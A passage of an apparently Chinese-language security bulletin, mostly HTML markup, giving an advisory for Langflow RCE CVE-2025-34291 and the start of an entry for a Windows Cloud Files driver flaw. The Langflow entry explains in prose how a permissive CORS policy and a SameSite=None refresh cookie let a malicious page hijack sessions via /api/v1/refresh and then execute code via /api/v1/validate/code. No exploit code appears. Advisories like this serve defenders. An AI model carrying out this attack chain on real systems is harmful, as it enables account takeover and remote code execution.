代码，从而可能读取/修改文件、窃取敏感环境变量与凭证，并进一步攻击内部服务等。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="9 12 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Langflow 远程代码执行漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-34291）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">中危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="color: rgb(0, 82, 255);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><a href="https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform" target="_blank">https://www.obsidiansecurity.com/blog/cve-2025-34291-critical-account-takeover-and-rce-vulnerability-in-the-langflow-ai-agent-workflow-platform</a></span></span></p><p><span style="color: rgb(0, 82, 255);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><a href="https://docs.langflow.org/api-keys-and-authentication" target="_blank">https://docs.langflow.org/api-keys-and-authentication</a><a class="wx_topic_link" topic-id="mj2om2zr-8iz6pa" style="color: #576B95 !important;" data-topic="1">#cors</a>-configuration-for-authentication</span></span></p><p><span style="color: rgb(0, 82, 255);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf=""><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-34291" target="_blank">https://nvd.nist.gov/vuln/detail/CVE-2025-34291</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Langflow 被披露其存在远程代码执行漏洞，漏洞编号CVE-2025-34291。可导致远程攻击者执行任意代码等危害。LangFlow 是一个基于 Python 开发，并且不依赖于任何模型、API 或数据库的低代码应用程序构建工具，是 LangChain 的 GUI，为用户提供更方便的构建方式，可直接通过拖放组件和聊天框来实验和原型化流程。 据描述，在 Langflow 中，由于后端服务器启用了过度宽松的 CORS 策略（allow_origins=&#39;*&#39; 且 allow_credentials=True），并且如果关键的身份验证令牌—— Cookie（refresh_token_lf）被设置为 SameSite=None，则导致攻击者可构造恶意网页并诱导受害者发起包含该 Cookie 凭证的跨源请求，成功调用受攻击的 /api/v1/refresh 端点，从而获取新的 access_token 与 refresh_token 令牌对，实现完全会话劫持。并且攻击者可利用窃取的 access_token，调用已认证的内置代码执行（如 /api/v1/validate/code）等端点，最终在受害者会话中实现远程代码执行，从而彻底控制系统。 目前该漏洞的漏洞细节、POC已公开。</span></p></div></div></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Windows Cloud Files Mini Filter Driver 本地权限提升漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-62221）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" 